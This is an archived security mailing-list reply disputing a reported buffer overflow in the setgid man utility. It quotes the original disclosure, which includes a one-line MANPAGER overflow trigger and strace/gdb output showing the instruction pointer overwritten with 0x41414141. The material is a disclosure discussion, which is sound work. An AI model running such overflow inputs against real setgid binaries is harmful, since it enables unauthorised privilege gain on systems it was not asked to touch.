Hi, I could not reproduce this on a SuSE 6.2 system running: man, version 2.3.10, db 2.3.1, July 12th, 1995 (G.Wilfordat_private) My copy is setgid man and I also subjected it to 4,8, and 20 kb buffers in every envrionment variable it uses without it flinching. Michal Zalewski wrote: > > With most of Linux distributions, /usr/bin/man is shipped as setgid man. > This setgid bit is required to build formatted manpages in /var/catman for > faster access. Unfortunately, man does almost everything via system() > calls, where parameters are user-dependent, and almost always it's > sprintf'ed before to fixed size buffers. It's kinda trivial to gain man > privledges, using buffer overflows in enviromental variables. For example, > by specyfing MANPAGER variable with approx 4k 'A' letters, you'll get > SEGV: > > $ MANPAGER=`perl -e '{print "A"x4000}'` man ls > > [...] > > 1200 setuid(500) = 0 > 1200 setgid(15) = 0 > 1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory) > 1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory) > 1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200 close(-1) = -1 EBADF (Bad file descriptor) > 1200 write(2, "Error executing formatting or display command.\nSystem command (cd /usr/man ; (echo > 1200 --- SIGSEGV (Naruszenie ochrony pamiêci) --- > 1200 +++ killed by SIGSEGV +++ > > Program received signal SIGSEGV, Segmentation fault. > 0x41414141 in ?? ()
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:37:50 PDT